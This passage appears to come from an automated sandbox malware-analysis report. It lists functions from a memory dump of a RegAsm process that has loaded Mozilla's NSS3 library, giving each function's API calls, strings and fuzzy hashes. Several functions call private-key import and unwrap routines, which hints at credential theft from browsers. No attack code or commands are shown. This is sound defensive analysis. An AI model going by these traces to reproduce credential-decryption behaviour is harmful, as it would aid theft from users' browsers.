sqlite3_mprintf.NSS3(snippet), ref: 6C13EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C13EFE4

Part of subcall function 6C1FDFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C0D5001,?,00000003,00000000), ref: 6C1FDFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C13F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C13F129
sqlite3_mprintf.NSS3(optimize), ref: 6C13F1D1
sqlite3_free.NSS3(?), ref: 6C13F368

Strings

fts3tokenize, xrefs: 6C13F30F
fts3, xrefs: 6C13F247
simple, xrefs: 6C13ED79
fts4, xrefs: 6C13F2AD
snippet, xrefs: 6C13EF05, 6C13EF37, 6C13EF7C
fts4aux, xrefs: 6C13ECF9
optimize, xrefs: 6C13F199, 6C13F1CC, 6C13F211
offsets, xrefs: 6C13EFAF, 6C13EFDF, 6C13F01F
matchinfo, xrefs: 6C13F04F, 6C13F082, 6C13F0C2, 6C13F0F2, 6C13F124, 6C13F169
porter, xrefs: 6C13ED97
fts3_tokenizer, xrefs: 6C13EE1A, 6C13EEA8
unicode61, xrefs: 6C13EDB5

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: eab818cf87a22984b5fd801e6e32ac11f6bb7e879a67a8ba8b928f944774e7ad
Instruction ID: 38b611b26894ccb6c729e7ba0ec0a1bbb17665f3a952ef807b2edf5a62f8f953
Opcode Fuzzy Hash: eab818cf87a22984b5fd801e6e32ac11f6bb7e879a67a8ba8b928f944774e7ad
Instruction Fuzzy Hash: 8D0203B5B047108BE7049F61A88972B76B2ABD530CF14993CDC6D57B80EF74E84AC792

Function 6C1B7C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1B7C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C1B7C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6C1B7D1E

Part of subcall function 6C1B7870: SECOID_FindOID_Util.NSS3(?,?,?,6C1B91C5), ref: 6C1B788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1B7D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C1B7D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C1B7DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C1B7DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1B7DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C1B7E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C1B7E58

Part of subcall function 6C1B7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C1B91C5), ref: 6C1B78BB
Part of subcall function 6C1B7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C1B91C5), ref: 6C1B78FA
Part of subcall function 6C1B7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C1B91C5), ref: 6C1B7930
Part of subcall function 6C1B7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C1B91C5), ref: 6C1B7951
Part of subcall function 6C1B7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C1B7964
Part of subcall function 6C1B7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C1B797A
Part of subcall function 6C1B7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C1B7988
Part of subcall function 6C1B7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C1B7998
Part of subcall function 6C1B7870: free.MOZGLUE(00000000), ref: 6C1B79A7
Part of subcall function 6C1B7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C1B91C5), ref: 6C1B79BB
Part of subcall function 6C1B7870: PR_GetCurrentThread.NSS3(?,?,?,?,6C1B91C5), ref: 6C1B79CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1B7E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C1B7F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C1B7F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C1B7FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C1B7FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C1B8038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C1B8050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C1B8093
SECOID_FindOID_Util.NSS3 ref: 6C1B7F29

Part of subcall function 6C1B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C158298,?,?,?,6C14FCE5,?), ref: 6C1B07BF
Part of subcall function 6C1B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C1B07E6
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B081B
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B0825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C1B8072
SECOID_FindOID_Util.NSS3 ref: 6C1B80F5

Part of subcall function 6C1BBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C1B800A,00000000,?,00000000,?), ref: 6C1BBC3F

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: 2b5ab056ca14d69fa290b41889278acf1590c880f34d052d1f6dc89337ddbf00
Instruction ID: 49de0e9bfa7c9d730359bcd179e17ef6d69c12491f3f1dfdf5fc9b596d9f497b
Opcode Fuzzy Hash: 2b5ab056ca14d69fa290b41889278acf1590c880f34d052d1f6dc89337ddbf00
Instruction Fuzzy Hash: 18E1A2716083019FE710CF28C880B5AB7E5EF54748F15496EE89AABB51E731EC15CFA2

Function 6C141C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6C141C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C141C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C141CA1
GetLengthSid.ADVAPI32(?), ref: 6C141CA9
malloc.MOZGLUE(00000000), ref: 6C141CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C141CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C141CE4
GetLengthSid.ADVAPI32(?), ref: 6C141CEC
malloc.MOZGLUE(00000000), ref: 6C141CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C141D0F
CloseHandle.KERNEL32(?), ref: 6C141D17
AllocateAndInitializeSid.ADVAPI32 ref: 6C141D4D
GetLastError.KERNEL32 ref: 6C141D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C141D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C141D7A

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: 8ff59901f5a52ecb09b1fc8133b20741daf41b73e3d2bc1b024fd9274ea40699
Instruction ID: 93bd798279953e2df06d63d1543f39b12caaf441dcb6145674a7a726431f542f
Opcode Fuzzy Hash: 8ff59901f5a52ecb09b1fc8133b20741daf41b73e3d2bc1b024fd9274ea40699
Instruction Fuzzy Hash: B53142B1A012189FDB11DF64DC4CBAA7BB8EF49744F004065FE0992191EB315994CF65

Function 6C143D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C143DFB
__allrem.LIBCMT ref: 6C143EEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C143FA3
memcpy.VCRUNTIME140(?,?,00000001), ref: 6C144047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C1440DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C14415F
__allrem.LIBCMT ref: 6C14416B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C144288
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C1442AB
__allrem.LIBCMT ref: 6C1442B7

Strings

%03d, xrefs: 6C1442E8
%04d, xrefs: 6C14407B
%02d, xrefs: 6C144086
%lld, xrefs: 6C143FB2

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
String ID: %02d$%03d$%04d$%lld
API String ID: 703928654-3678606288
Opcode ID: 03c6d3d3593e7f0902544138435cf7a2b110cfa3ca370857e3ead09781876dd6
Instruction ID: 3b45dd22d91c763c386d3f05204f255d2451d2224fe1dd0e67085cbd03424c45
Opcode Fuzzy Hash: 03c6d3d3593e7f0902544138435cf7a2b110cfa3ca370857e3ead09781876dd6
Instruction Fuzzy Hash: A0F143B1A087409FD715CF38C881BABB7F6AF95304F14CA2DE98597A51E734D446CB42

Function 6C14EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C14EF63

Part of subcall function 6C1587D0: PORT_NewArena_Util.NSS3(00000800,6C14EF74,00000000), ref: 6C1587E8
Part of subcall function 6C1587D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C14EF74,00000000), ref: 6C1587FD
Part of subcall function 6C1587D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C15884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C14F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C14F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C14F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C14F374
PL_strcasecmp.NSS3(6C292FD4,?), ref: 6C14F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C14F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C14F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C14F67D
CERT_DestroyName.NSS3(?), ref: 6C14F68B

Part of subcall function 6C158320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C158338
Part of subcall function 6C158320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C158364
Part of subcall function 6C158320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C15838E
Part of subcall function 6C158320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C1583A5
Part of subcall function 6C158320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1583E3

Part of subcall function 6C1584C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C1584D9
Part of subcall function 6C1584C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C158528

Part of subcall function 6C158900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C14F599,?,00000000), ref: 6C158955

Strings

", xrefs: 6C14F21B
*, xrefs: 6C14F3C6
oid., xrefs: 6C14F2CF

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: 3f7907921554d7bab243b72efedc94a8520505a555d0200e45baf51d7b5c35eb
Instruction ID: b6073557d17aa976c01a9d34947e761876ee88d3c3e39bbf74612aa6f7475089
Opcode Fuzzy Hash: 3f7907921554d7bab243b72efedc94a8520505a555d0200e45baf51d7b5c35eb
Instruction Fuzzy Hash: B22228716083418FE710CE28C49076AB7E6ABD5328F19CA2EE5B587B91E735DC06CB53

Function 6C0F1C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0F1D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C0F1EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C0F1FB7

Strings

SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C0F1F83
no more rows available, xrefs: 6C0F2264
unsupported file format, xrefs: 6C0F2188
table, xrefs: 6C0F1C8B
sqlite_temp_master, xrefs: 6C0F1C5C
attached databases must use the same text encoding as main database, xrefs: 6C0F20CA
sqlite_master, xrefs: 6C0F1C61
unknown error, xrefs: 6C0F2291
another row available, xrefs: 6C0F2287
abort due to ROLLBACK, xrefs: 6C0F2223

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: f27dda3fcb01a25dce20e70003b70f53b99f1fa63fb65a013e7f8dd92a407728
Instruction ID: 05589d763697330573e3ade0e46f4452a001ab311f383b1cf6ea9cfc7bfaa15a
Opcode Fuzzy Hash: f27dda3fcb01a25dce20e70003b70f53b99f1fa63fb65a013e7f8dd92a407728
Instruction Fuzzy Hash: 0512E1B16083818FD705CF19C08475AB7F2BF85318F19856DEDA58BB52D731E88ACB82

Function 6C0DECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0DED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0DEE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0DEF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C0DEF98

Strings

%s at line %d of [%.10s], xrefs: 6C0DF492
database corruption, xrefs: 6C0DF48D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0DF483

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: b000944b6a31856b1fc5a1f05056070b82bf4a667a5232e35151d353a54594d1
Instruction ID: e160e14647048ab41c975e19c1cd03eaf4696a191b95b3f7c069bf66f5c396d2
Opcode Fuzzy Hash: b000944b6a31856b1fc5a1f05056070b82bf4a667a5232e35151d353a54594d1
Instruction Fuzzy Hash: 4362F070A043458FEB04CF28C484BAEBBF5BF49318F1A8199D9555BB92D731F886CB91

Function 6C17FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON

Download Yara Rule

APIs

PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6C17FD06

Part of subcall function 6C17F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6C17F696
Part of subcall function 6C17F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6C17F789
Part of subcall function 6C17F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6C17F796
Part of subcall function 6C17F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6C17F79F
Part of subcall function 6C17F670: SECITEM_DupItem_Util.NSS3 ref: 6C17F7F0

Part of subcall function 6C1A3440: PK11_GetAllTokens.NSS3 ref: 6C1A3481
Part of subcall function 6C1A3440: PR_SetError.NSS3(00000000,00000000), ref: 6C1A34A3
Part of subcall function 6C1A3440: TlsGetValue.KERNEL32 ref: 6C1A352E
Part of subcall function 6C1A3440: EnterCriticalSection.KERNEL32(?), ref: 6C1A3542
Part of subcall function 6C1A3440: PR_Unlock.NSS3(?), ref: 6C1A355B

SECITEM_DupItem_Util.NSS3(?), ref: 6C17FDAD

Part of subcall function 6C1AFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C159003,?), ref: 6C1AFD91
Part of subcall function 6C1AFD80: PORT_Alloc_Util.NSS3(A4686C1B,?), ref: 6C1AFDA2
Part of subcall function 6C1AFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C1B,?,?), ref: 6C1AFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C17FE00

Part of subcall function 6C1AFD80: free.MOZGLUE(00000000,?,?), ref: 6C1AFDD1

Part of subcall function 6C19E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C19E5A0

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C17FEBB
PK11_FreeSymKey.NSS3(00000000), ref: 6C17FEC8
PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6C17FED3
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C17FF0C
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C17FF23
PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6C17FF4D
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C17FFDA
PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6C180007
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C180029
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C180044

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
String ID:
API String ID: 138705723-0
Opcode ID: 972433756577015f10547500239fdd20a37944e03e06d5bac563c0d1b22bc015
Instruction ID: de59937a85765045539cf0a43e896bab1a816eed8fd1dd6cf6416259b2d476f1
Opcode Fuzzy Hash: 972433756577015f10547500239fdd20a37944e03e06d5bac563c0d1b22bc015
Instruction Fuzzy Hash: 36B1B571504301AFE714CF29C850B6BB7E5FF88308F558A1DE96987A41EB70E945CBA1

Function 6C177D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6C177DDC

Part of subcall function 6C1B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C158298,?,?,?,6C14FCE5,?), ref: 6C1B07BF
Part of subcall function 6C1B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C1B07E6
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B081B
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B0825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C177DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C177F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6C177F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C177F98
PK11_FreeSymKey.NSS3(?), ref: 6C177FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C177FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C178000

Part of subcall function 6C199430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C177F0C,?,00000000,00000000,00000000,?), ref: 6C19943B
Part of subcall function 6C199430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C19946B
Part of subcall function 6C199430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C199546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C178110
PK11_FreeSymKey.NSS3(00000000), ref: 6C17811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C17822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C17823C

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: 7c8bc2d4bfdbddcf04348bc819c8a7a3fd535f6a0c163ed4b2c733a275109f12
Instruction ID: 57e73324b28442dda8427708086cb0704af5f201639f1d01a260d37ae348f96b
Opcode Fuzzy Hash: 7c8bc2d4bfdbddcf04348bc819c8a7a3fd535f6a0c163ed4b2c733a275109f12
Instruction Fuzzy Hash: A3C16AB1D002599FEB21CF14CC44BEAB7B8EB15308F0185EAE91DB6641E7719E85CFA0

Function 6C0EAEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C20CF46,?,6C0DCDBD,?,6C20BF31,?,?,?,?,?,?,?), ref: 6C0EB039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C20CF46,?,6C0DCDBD,?,6C20BF31), ref: 6C0EB090
sqlite3_free.NSS3(?,?,?,?,?,?,6C20CF46,?,6C0DCDBD,?,6C20BF31), ref: 6C0EB0A2
